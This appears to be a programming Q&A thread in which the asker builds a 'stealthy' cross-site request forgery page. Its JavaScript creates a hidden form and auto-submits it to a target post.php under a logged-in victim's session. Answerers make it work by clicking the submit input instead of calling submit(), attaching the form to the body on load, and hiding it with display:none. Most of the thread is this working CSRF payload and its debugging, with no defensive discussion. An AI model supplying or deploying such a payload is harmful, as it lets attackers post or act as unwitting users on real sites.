# Can't set the submit type input in a form created with Java Script

Tags: javascript, php, html, forms, csrf

I am working on a project where I have to carryout CSRF on a web page. So when the user is logged in and when he clicks on my webpage, I have to post with his username(derived from the cookie) .

I tried creating my own form using the following code , So that when the user clicks my webpage, this form will post into post.php(target webpage)

```
<html>
<script language="javascript">

  function blah() {
    alert();
  var theForm, newInput1, newInput2, newInput3;
  var bla = "Aaada";
  var bla2 ="POST";
  // Start by creating a <form>
  theForm = document.createElement("form");
  theForm.action = "http://targeturl/post.php";
  theForm.method = "post";

  newInput1 = document.createElement("input");
  newInput1.type = "text";
  newInput1.name = "username";
  newInput1.value = bla;

  newInput2 = document.createElement("textarea");
  newInput2.name = "message";
  newInput2.value = bla;
    newInput2.id = "message";

  newInput3 = document.createElement("input");
  newInput3.type = "submit";
  newInput3.name = "post_submit";
  newInput3.value = bla2;
  newInput3.id = "post_submit";

  theForm.appendChild(newInput3);
  theForm.appendChild(newInput2);
  theForm.appendChild(newInput1); 
  theForm.submit();

  }
  blah();
</script>
</html>
```

Title, Message and Submit button are the three inputs in the target form.
When I try running this form, the submit button alone is not set. I am not able to understand why. I tried an actual form in html (with  ) and posted it to the target URL, it works .

But since I have to be stealthy, I have to manually build the form , like the code I have posted. I tried all posssibilites and I am not able to nail the actual reason why this variable is not setting.

PS:

```
 if (isset($_POST['post_submit'])) {
```

is the check in target page

and below id the target form :

```
<form method="post" action="post.php">
            Title: <input type="text" name="title" maxlength="50"/>
            <br />
            <br />
            Posting:
            <br />
            <br />
            <textarea name="message" cols="120" rows="10" id="message"></textarea>
            <br />
            <br />
            <input name="post_submit" type="submit" id="post_submit" value="POST" />
            </form>
```

(It posts to itself, I have not included the remaining code of target)

Any help would be appreciated
Thanks

Comment: did you check on firebug whether any js related errors occurs ?

Comment: Yup, nothing on that

Answer (score 0):

If you trigger the click event instead of the submit event, you'll get the submit button as well, so replace

```
theForm.submit();
```

with

```
newInput3.click();
```

Comment: Thanks a lot ! Works a lot for me!

Answer (score 0):

add `document.body.appendChild(theForm);` in java script
 before submit and enclose your function call as :

```
window.onload = function() {
    blah();
}
```

else you will get `document.body is null` error in js

Comment: this makes form visible so if u want to hide it apply style `display:none` to that form